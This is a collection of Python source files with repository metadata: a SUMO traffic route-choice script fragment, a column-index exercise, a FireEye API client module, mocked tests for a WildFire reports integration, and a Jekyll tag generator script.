print("could not parse weights file: " + str(addWeightsfile))
else:
resetEdges(edgesMap)
fout = open(outputAltfile, 'w')
foutrout = open(outputRoufile, 'w')
fout.write('<?xml version="1.0"?>\n')
fout.write('<!--\n')
fout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
fout.write('-->\n')
fout.write('<route-alternatives>\n')
foutrout.write('<?xml version="1.0"?>\n')
foutrout.write('<!--\n')
foutrout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
foutrout.write('-->\n')
foutrout.write('<routes>')
print('parse dumpfile')
print(dumpfile)
parse(dumpfile, dumpsReader(edgesList, edgesMap))
# parse routeAltfile from SUMO
try:
print('parse routeAltfile:', routeAltfile)
parse(routeAltfile, routeReader(vehList, vehMap))
except IOError:
print('could not parse routeAltfile:', routeAltfile)
ex_outputAltFile = prefix[
:prefix.rfind('_')] + '_%03i' % (step - 1) + '.rou.galt.xml'
try:
print('parse routeAltfile from externalGawron: ', ex_outputAltFile)
parse(ex_outputAltFile, vehrouteReader(
vehList, vehMap, edgesMap, fout, foutrout, ecoMeasure, alpha, beta))
except IOError:
print('could not parse routeAltfile from externalGawron:', ex_outputAltFile)
return outputRoufile, edgesMap
def gawron(r1, r2, alpha):
a = alpha
delta = (r2.act_cost - r1.act_cost) / (r1.act_cost + r2.act_cost)
g = math.exp(a * delta / (1 - delta * delta))
ex_prob = r1.probability
r1.probability = (r1.probability * (r1.probability + r2.probability) *
g) / (r1.probability * g + r2.probability) # check together with Eva
r2.probability = ex_prob + r2.probability - r1.probability
def calFirstRouteProbs(dumpfile, sumoAltFile, addweights, ecoMeasure=None):
basename = sumoAltFile.split('_')[0]
outputAltFile = basename + "_001.rou.galt.xml"
outputRouFile = basename + "_001.rou.alt.xml"
edgesList = []
edgesMap = {}
vehList = []
vehMap = {}
# parse(netfile, netReader(edgesList, edgesMap))
parse(addweights, addweightsReader(edgesList, edgesMap))
parse(dumpfile, dumpsReader(edgesList, edgesMap))
parse(sumoAltFile, routeReader(vehList, vehMap))
fout = open(outputAltFile, 'w')
foutrout = open(outputRouFile, 'w')
fout.write('<?xml version="1.0"?>\n')
fout.write('<!--\n')
fout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
fout.write('-->\n')
fout.write('<route-alternatives>\n')
foutrout.write('<?xml version="1.0"?>\n')
foutrout.write('<!--\n')
foutrout.write('route choices are generated with use of %s' %
os.path.join(os.getcwd(), 'routeChoices.py'))
foutrout.write('-->\n')
foutrout.write('<routes>')
for v in vehMap:
vehObj = vehMap[v]
for r in vehObj.routesList:
for e in r.edges.split(' '):
eObj = edgesMap[e]
if ecoMeasure != 'fuel' and eObj.traveltime == 0.:
r.act_cost += eObj.freetraveltime
r.ex_cost += eObj.freetraveltime
elif ecoMeasure != 'fuel' and eObj.traveltime > 0.:
r.act_cost += eObj.traveltime
r.ex_cost += eObj.freetraveltime
elif ecoMeasure == 'fuel' and eObj.fuel_perVeh == 0.:
r.act_cost += eObj.fuel_perVeh_default
r.ex_cost += eObj.fuel_perVeh_default
elif ecoMeasure == 'fuel' and eObj.fuel_perVeh > 0.:
r.act_cost += eObj.fuel_perVeh
r.ex_cost += eObj.fuel_perVeh
costSum = 0.
for r in vehObj.routesList:
costSum += r.ex_cost
for r in vehObj.routesList:
r.ex_probability = r.ex_cost / costSum
randProb = random.random()
selected = 0
if len(vehObj.routesList) > 1:
cumulatedProbs = 0.
for i, r in enumerate(vehObj.routesList):
cumulatedProbs += r.ex_probability
if cumulatedProbs >= randProb:
selected = i
break
# generate the *.rou.xml
foutrout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (vehObj.label, vehObj.depart, vehObj.departlane, vehObj.departpos, vehObj.departspeed))
foutrout.write(
' <route edges="%s"/>\n' % vehObj.routesList[selected].edges)
foutrout.write(' </vehicle> \n')
# generate the *.rou.alt.xml
fout.write(' <vehicle id="%s" depart="%.2f" departLane="%s" departPos="%s" departSpeed="%s">\n'
% (vehObj.label, vehObj.depart, vehObj.departlane, vehObj.departpos, vehObj.departspeed))
fout.write(' <routeDistribution last="%s">\n' % selected)
for route in vehObj.routesList:
fout.write(' <route cost="%.4f" probability="%s" edges="%s"/>\n' %
(route.act_cost, route.ex_probability, route.edges))
fout.write(' </routeDistribution>\n')
fout.write(' </vehicle> \n')
fout.write('</route-alternatives>\n')
fout.close()
foutrout.write('</routes>\n')
foutrout.close()
| 39.842832 | 120 | 0.5637 |
ed71656700d1db7b25b8e9ec5248f1b9bc9d5715
| 358 |
py
|
Python
|
elements/python/5/9/soln.py
|
mmcloughlin/problems
|
6095842ffe007a12ec8c2093850515aa4e046616
|
[
"MIT"
] | 11 |
2019-02-08T06:54:34.000Z
|
2021-08-07T18:57:39.000Z
|
elements/python/5/9/soln.py
|
mmcloughlin/problems
|
6095842ffe007a12ec8c2093850515aa4e046616
|
[
"MIT"
] | 1 |
2019-05-21T08:14:10.000Z
|
2019-05-21T08:14:10.000Z
|
elements/python/5/9/soln.py
|
mmcloughlin/problems
|
6095842ffe007a12ec8c2093850515aa4e046616
|
[
"MIT"
] | null | null | null |
def column_index(ref):
n = 0
for ch in ref:
x = ord(ch) - ord('A') + 1
n = 26*n + x
return n
def test():
assert column_index('A') == 1
assert column_index('Z') == 26
assert column_index('AA') == 27
assert column_index('AZ') == 52
def main():
test()
print 'pass'
if __name__ == '__main__':
main()
| 15.565217 | 35 | 0.522346 |
1314332eb6760e67b08fcc54cc48edf6495afbcd
| 15,488 |
py
|
Python
|
Packs/ApiModules/Scripts/FireEyeApiModule/FireEyeApiModule.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
Packs/ApiModules/Scripts/FireEyeApiModule/FireEyeApiModule.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | 2 |
2021-12-26T07:34:37.000Z
|
2021-12-26T07:49:34.000Z
|
Packs/ApiModules/Scripts/FireEyeApiModule/FireEyeApiModule.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
from CommonServerPython import *
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' CONSTANTS '''
FE_DATE_FORMAT = '%Y-%m-%dT%H:%M:%S'
OK_CODES = (200, 206)
class FireEyeClient(BaseClient):
def __init__(self, base_url: str,
username: str, password: str,
verify: bool, proxy: bool,
ok_codes: tuple = OK_CODES):
super().__init__(base_url=base_url, auth=(username, password), verify=verify, proxy=proxy, ok_codes=ok_codes)
self._headers = {
'X-FeApi-Token': self._get_token(),
'Accept': 'application/json',
}
@logger
def http_request(self, method: str, url_suffix: str = '', json_data: dict = None, params: dict = None,
timeout: int = 10, resp_type: str = 'json', retries: int = 1):
try:
address = urljoin(self._base_url, url_suffix)
res = self._session.request(
method,
address,
headers=self._headers,
verify=self._verify,
params=params,
json=json_data,
timeout=timeout
)
# Handle error responses gracefully
if not self._is_status_code_valid(res):
err_msg = f'Error in API call {res.status_code} - {res.reason}'
try:
# Try to parse json error response
error_entry = res.json()
err_msg += f'\n{json.dumps(error_entry)}'
if 'Server Error. code:AUTH004' in err_msg and retries:
# implement 1 retry to re create a token
self._headers['X-FeApi-Token'] = self._generate_token()
self.http_request(method, url_suffix, json_data, params, timeout, resp_type, retries - 1)
else:
raise DemistoException(err_msg, res=res)
except ValueError:
err_msg += f'\n{res.text}'
raise DemistoException(err_msg, res=res)
resp_type = resp_type.lower()
try:
if resp_type == 'json':
return res.json()
if resp_type == 'text':
return res.text
if resp_type == 'content':
return res.content
return res
except ValueError:
raise DemistoException('Failed to parse json object from response.')
except requests.exceptions.ConnectTimeout as exception:
err_msg = 'Connection Timeout Error - potential reasons might be that the Server URL parameter' \
' is incorrect or that the Server is not accessible from your host.'
raise DemistoException(err_msg, exception)
except requests.exceptions.SSLError as exception:
# in case the "Trust any certificate" is already checked
if not self._verify:
raise
err_msg = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' checkbox in' \
' the integration configuration.'
raise DemistoException(err_msg, exception)
except requests.exceptions.ProxyError as exception:
err_msg = 'Proxy Error - if the \'Use system proxy\' checkbox in the integration configuration is' \
' selected, try clearing the checkbox.'
raise DemistoException(err_msg, exception)
except requests.exceptions.ConnectionError as exception:
# Get originating Exception in Exception chain
error_class = str(exception.__class__)
err_type = '<' + error_class[error_class.find('\'') + 1: error_class.rfind('\'')] + '>'
err_msg = f'Verify that the server URL parameter' \
f' is correct and that you have access to the server from your host.' \
f'\nError Type: {err_type}\nError Number: [{exception.errno}]\nMessage: {exception.strerror}\n'
raise DemistoException(err_msg, exception)
@logger
def _get_token(self) -> str:
"""
Obtains token from integration context if available and still valid
(15 minutes according to the API, we gave 10 minutes).
After expiration, new token are generated and stored in the integration context.
Returns:
str: token that will be added to authorization header.
"""
integration_context = get_integration_context()
token = integration_context.get('token', '')
valid_until = integration_context.get('valid_until')
now = datetime.now()
now_timestamp = datetime.timestamp(now)
# if there is a key and valid_until, and the current time is smaller than the valid until
# return the current token
if token and valid_until:
if now_timestamp < valid_until:
return token
# else generate a token and update the integration context accordingly
token = self._generate_token()
return token
@logger
def _generate_token(self) -> str:
resp = self._http_request(method='POST', url_suffix='auth/login', resp_type='response')
if resp.status_code != 200:
raise DemistoException(
f'Token request failed with status code {resp.status_code}. message: {str(resp)}')
if 'X-FeApi-Token' not in resp.headers:
raise DemistoException(
f'Token request failed. API token is missing. message: {str(resp)}')
token = resp.headers['X-FeApi-Token']
integration_context = get_integration_context()
integration_context.update({'token': token})
time_buffer = 600 # 600 seconds (10 minutes) by which to lengthen the validity period
integration_context.update({'valid_until': datetime.timestamp(datetime.now() + timedelta(seconds=time_buffer))})
set_integration_context(integration_context)
return token
@logger
def get_alerts_request(self, request_params: Dict[str, Any]) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix='alerts', params=request_params, resp_type='json')
@logger
def get_alert_details_request(self, alert_id: str, timeout: int) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'alerts/alert/{alert_id}', resp_type='json',
timeout=timeout)
@logger
def alert_acknowledge_request(self, uuid: str) -> Dict[str, str]:
# json_data here is redundant as we are not sending any meaningful data,
# but without it the API call to FireEye fails and we are getting an error. hence sending it with a dummy value.
# the error we get when not sending json_data is: "Bad Request" with Invalid input. code:ALRTCONF001
return self.http_request(method='POST', url_suffix=f'alerts/alert/{uuid}',
params={'schema_compatibility': True}, json_data={"annotation": "<test>"},
resp_type='resp')
@logger
def get_artifacts_by_uuid_request(self, uuid: str, timeout: int) -> Dict[str, str]:
self._headers.pop('Accept') # returns a file, hence this header is disruptive
return self.http_request(method='GET', url_suffix=f'artifacts/{uuid}', resp_type='content',
timeout=timeout)
@logger
def get_artifacts_metadata_by_uuid_request(self, uuid: str) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'artifacts/{uuid}/meta', resp_type='json')
@logger
def get_events_request(self, duration: str, end_time: str, mvx_correlated_only: bool) -> Dict[str, str]:
return self.http_request(method='GET',
url_suffix='events',
params={
'event_type': 'Ips Event',
'duration': duration,
'end_time': end_time,
'mvx_correlated_only': mvx_correlated_only
},
resp_type='json')
@logger
def get_quarantined_emails_request(self, start_time: str, end_time: str, from_: str, subject: str,
appliance_id: str, limit: int) -> Dict[str, str]:
params = {
'start_time': start_time,
'end_time': end_time,
'limit': limit
}
if from_:
params['from'] = from_
if subject:
params['subject'] = subject
if appliance_id:
params['appliance_id'] = appliance_id
return self.http_request(method='GET', url_suffix='emailmgmt/quarantine', params=params, resp_type='json')
@logger
def release_quarantined_emails_request(self, queue_ids: list, sensor_name: str):
return self.http_request(method='POST',
url_suffix='emailmgmt/quarantine/release',
params={'sensorName': sensor_name},
json_data={"queue_ids": queue_ids},
resp_type='resp')
@logger
def delete_quarantined_emails_request(self, queue_ids: list, sensor_name: str = ''):
return self.http_request(method='POST',
url_suffix='emailmgmt/quarantine/delete',
params={'sensorName': sensor_name},
json_data={"queue_ids": queue_ids},
resp_type='resp')
@logger
def download_quarantined_emails_request(self, queue_id: str, timeout: str, sensor_name: str = ''):
self._headers.pop('Accept') # returns a file, hence this header is disruptive
return self.http_request(method='GET',
url_suffix=f'emailmgmt/quarantine/{queue_id}',
params={'sensorName': sensor_name},
resp_type='content',
timeout=timeout)
@logger
def get_reports_request(self, report_type: str, start_time: str, end_time: str, limit: str, interface: str,
alert_id: str, infection_type: str, infection_id: str, timeout: int):
params = {
'report_type': report_type,
'start_time': start_time,
'end_time': end_time
}
if limit:
params['limit'] = limit
if interface:
params['interface'] = interface
if alert_id:
params['id'] = alert_id
if infection_type:
params['infection_type'] = infection_type
if infection_id:
params['infection_id'] = infection_id
return self.http_request(method='GET',
url_suffix='reports/report',
params=params,
resp_type='content',
timeout=timeout)
@logger
def list_allowedlist_request(self, type_: str) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}',
resp_type='json')
@logger
def create_allowedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}',
params={'operation': 'create'},
json_data={"name": entry_value, "matches": matches},
resp_type='resp')
@logger
def update_allowedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}/{entry_value}',
json_data={"matches": matches},
resp_type='resp')
@logger
def delete_allowedlist_request(self, type_: str, entry_value: str) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/allowed_lists/{type_}/{entry_value}',
params={'operation': 'delete'},
resp_type='resp')
@logger
def list_blockedlist_request(self, type_: str) -> Dict[str, str]:
return self.http_request(method='GET', url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}',
resp_type='json')
@logger
def create_blockedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}',
params={'operation': 'create'},
json_data={'name': entry_value, 'matches': matches},
resp_type='resp')
@logger
def update_blockedlist_request(self, type_: str, entry_value: str, matches: int) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}/{entry_value}',
json_data={"matches": matches},
resp_type='resp')
@logger
def delete_blockedlist_request(self, type_: str, entry_value: str) -> Dict[str, str]:
return self.http_request(method='POST',
url_suffix=f'devicemgmt/emlconfig/policy/blocked_lists/{type_}/{entry_value}',
params={'operation': 'delete'},
resp_type='resp')
def to_fe_datetime_converter(time_given: str = 'now') -> str:
"""Generates a string in the FireEye format, e.g: 2015-01-24T16:30:00.000-07:00
Examples:
>>> to_fe_datetime_converter('2021-05-14T01:08:04.000-02:00')
2021-05-14T01:08:04.000-02:00
>>> to_fe_datetime_converter('now')
2021-05-23T06:45:16.688+00:00
Args:
time_given: the time given, if none given, the default is now.
Returns:
The time given in FireEye format.
"""
date_obj = dateparser.parse(time_given)
fe_time = date_obj.strftime(FE_DATE_FORMAT)
fe_time += f'.{date_obj.strftime("%f")[:3]}'
if not date_obj.tzinfo:
given_timezone = '+00:00'
else:
given_timezone = f'{date_obj.strftime("%z")[:3]}:{date_obj.strftime("%z")[3:]}' # converting the timezone
fe_time += given_timezone
return fe_time
def alert_severity_to_dbot_score(severity_str: str):
severity = severity_str.lower()
if severity == 'minr':
return 1
if severity == 'majr':
return 2
if severity == 'crit':
return 3
demisto.info(f'FireEye Incident severity: {severity} is not known. Setting as unknown(DBotScore of 0).')
return 0
| 46.650602 | 120 | 0.570764 |
b95a46feb812629ea5b487e0c49294b20678f680
| 301 |
py
|
Python
|
project/api/fields.py
|
DanielGrams/cityservice
|
c487c34b5ba6541dcb441fe903ab2012c2256893
|
[
"MIT"
] | null | null | null |
project/api/fields.py
|
DanielGrams/cityservice
|
c487c34b5ba6541dcb441fe903ab2012c2256893
|
[
"MIT"
] | 35 |
2022-01-24T22:15:59.000Z
|
2022-03-31T15:01:35.000Z
|
project/api/fields.py
|
DanielGrams/cityservice
|
c487c34b5ba6541dcb441fe903ab2012c2256893
|
[
"MIT"
] | null | null | null |
from marshmallow import fields
from project.dateutils import berlin_tz
class CustomDateTimeField(fields.DateTime):
def _serialize(self, value, attr, obj, **kwargs):
if value:
value = value.astimezone(berlin_tz)
return super()._serialize(value, attr, obj, **kwargs)
| 25.083333 | 61 | 0.697674 |
b9855a7b8af3720e6d1dbd812feacca892103be0
| 5,114 |
py
|
Python
|
Packs/Palo_Alto_Networks_WildFire/Integrations/WildFireReports/WildFireReports_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 2 |
2021-12-06T21:38:24.000Z
|
2022-01-13T08:23:36.000Z
|
Packs/Palo_Alto_Networks_WildFire/Integrations/WildFireReports/WildFireReports_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 87 |
2022-02-23T12:10:53.000Z
|
2022-03-31T11:29:05.000Z
|
Packs/Palo_Alto_Networks_WildFire/Integrations/WildFireReports/WildFireReports_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 2 |
2022-01-05T15:27:01.000Z
|
2022-02-01T19:27:43.000Z
|
import base64
import demistomock as demisto
from WildFireReports import main
import requests_mock
def test_wildfire_report(mocker):
"""
Given:
A sha256 represents a file uploaded to WildFire.
When:
internal-wildfire-get-report command is running.
Then:
Ensure that the command is running as expected.
"""
mock_sha256 = 'abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567890'
mocker.patch.object(demisto, 'command', return_value='internal-wildfire-get-report')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': '123456'})
mocker.patch.object(demisto, 'args', return_value={'sha256': mock_sha256})
with open('test_data/response.pdf', 'rb') as file:
file_content = b''
while byte := file.read(1):
file_content += byte
mocker.patch('WildFireReports.fileResult', return_value=file_content) # prevent file creation
demisto_mock = mocker.patch.object(demisto, 'results')
with requests_mock.Mocker() as m:
m.post(f'https://test.com/publicapi/get/report?format=pdf&hash={mock_sha256}', content=file_content)
main()
assert demisto_mock.call_args_list[0][0][0]['data'] == base64.b64encode(file_content).decode()
def test_report_not_found(mocker):
"""
Given:
A sha256 represents a file not uploaded to WildFire.
When:
internal-wildfire-get-report command is running.
Then:
Ensure that the command is running as expected.
"""
mock_sha256 = 'abcdef1234567890abcdef1234567890abcdef1234567890abcdef1234567891'
mocker.patch.object(demisto, 'command', return_value='internal-wildfire-get-report')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': '123456'})
mocker.patch.object(demisto, 'args', return_value={'sha256': mock_sha256})
demisto_mock = mocker.patch.object(demisto, 'results')
with requests_mock.Mocker() as m:
m.post(f'https://test.com/publicapi/get/report?format=pdf&hash={mock_sha256}', status_code=404)
main()
assert demisto_mock.call_args[0][0] == {'status': 'not found'}
def test_incorrect_sha256(mocker):
"""
Given:
An incorrect sha256.
When:
internal-wildfire-get-report command is running.
Then:
Ensure that the command is running as expected.
"""
mock_sha256 = 'abcdef1234567890abcdef1234567890abcdef1234567890abcdef123456789' # The length is 63 insteadof 64
mocker.patch.object(demisto, 'command', return_value='internal-wildfire-get-report')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': '123456'})
mocker.patch.object(demisto, 'args', return_value={'sha256': mock_sha256})
demisto_mock = mocker.patch.object(demisto, 'results')
expected_description_error = 'Failed to download report.\nError:\nInvalid hash. Only SHA256 are supported.'
main()
assert demisto_mock.call_args_list[0].args[0].get('error', {}).get('description') == expected_description_error
def test_incorrect_authorization(mocker):
"""
Given:
An incorrect API token.
When:
test-module command is running.
Then:
Ensure that the command is running as expected.
"""
mocker.patch.object(demisto, 'command', return_value='test-module')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': 'incorrect api token'})
demisto_mock = mocker.patch.object(demisto, 'results')
expected_description_error = 'Authorization Error: make sure API Key is correctly set'
url = 'https://test.com/publicapi/get/report'
params = '?apikey=incorrect+api+token&format=pdf&hash=dca86121cc7427e375fd24fe5871d727'
with requests_mock.Mocker() as m:
m.post(url + params, status_code=401)
main()
assert demisto_mock.call_args_list[0].args[0] == expected_description_error
def test_empty_api_token(mocker):
"""
Given:
An empty API token.
When:
test-module command is running.
Then:
Ensure that the command is running as expected.
"""
mocker.patch.object(demisto, 'command', return_value='test-module')
mocker.patch.object(demisto, 'params', return_value={'server': 'https://test.com/', 'token': ''})
mocker.patch.object(demisto, 'getLicenseCustomField', return_value=None)
demisto_mock = mocker.patch('WildFireReports.return_error')
expected_description_error = 'Authorization Error: It\'s seems that the token is empty and you have not a ' \
'TIM license that is up-to-date, Please fill the token or update your TIM license ' \
'and try again.'
main()
assert demisto_mock.call_args_list[0].args[0] == expected_description_error
def test_user_secrets():
from WildFireReports import LOG, Client
client = Client(token='%%This_is_API_key%%', base_url='url')
res = LOG(client.token)
assert "%%This_is_API_key%%" not in res
| 37.881481 | 120 | 0.688698 |
b9e603dad544416c8aafede286add848d2811213
| 2,569 |
py
|
Python
|
tag_generator.py
|
e5k/e5k.github.io
|
9f2e2097a87e38501a12760024e655b9cb8e9226
|
[
"MIT"
] | null | null | null |
tag_generator.py
|
e5k/e5k.github.io
|
9f2e2097a87e38501a12760024e655b9cb8e9226
|
[
"MIT"
] | null | null | null |
tag_generator.py
|
e5k/e5k.github.io
|
9f2e2097a87e38501a12760024e655b9cb8e9226
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
tag_generator.py
Copyright 2017 Long Qian
Contact: [email protected]
This script creates tags for your Jekyll blog hosted by Github page.
No plugins required.
'''
import glob
import os
tag_dir = 'tag/'
post_dir = '_posts/'
filenames = glob.glob(post_dir + '*md')
page_dir = 'pages/'
filenames = filenames + glob.glob(page_dir + '*md')
#post_dir = 'pages/'
#filenames = filenames + [os.path.join(root, name)
# for root, dirs, files in os.walk(post_dir)
# for name in files
# if name.endswith(('md'))]
print filenames
total_tags = []
for filename in filenames:
f = open(filename, 'r')
crawl = False
for line in f:
if crawl:
current_tags = line.strip().split()
if current_tags[0] == 'tags:':
total_tags.extend(current_tags[1:])
crawl = False
break
if line.strip() == '---':
if not crawl:
crawl = True
else:
crawl = False
break
f.close()
total_tags = set(total_tags)
old_tags = glob.glob(tag_dir + '*.md')
for tag in old_tags:
os.remove(tag)
for tag in total_tags:
tag_filename = tag_dir + tag + '.md'
f = open(tag_filename, 'a')
write_str = '---\nlayout: tagpage\ntitle: \"Tag: ' + tag + '\"\ntag: ' + tag + '\nrobots: noindex\n---\n'
f.write(write_str)
f.close()
print("Tags generated, count", total_tags.__len__())
category_dir = 'category/'
total_categories = []
for filename in filenames:
f = open(filename, 'r')
crawl = False
for line in f:
if crawl:
current_categories = line.strip().split()
if current_categories[0] == 'categories:':
total_categories.extend(current_categories[1:])
crawl = False
break
if line.strip() == '---':
if not crawl:
crawl = True
else:
crawl = False
break
f.close()
total_categories = set(total_categories)
old_categories = glob.glob(category_dir + '*.md')
for category in old_categories:
os.remove(category)
for category in total_categories:
category_filename = category_dir + category + '.md'
f = open(category_filename, 'a')
write_str = '---\nlayout: categorypage\ntitle: \"Category: ' + category + '\"\ncategories: ' + category + '\nrobots: noindex\n---\n'
f.write(write_str)
f.close()
print("Categories generated, count", total_categories.__len__())
| 25.949495 | 136 | 0.58116 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.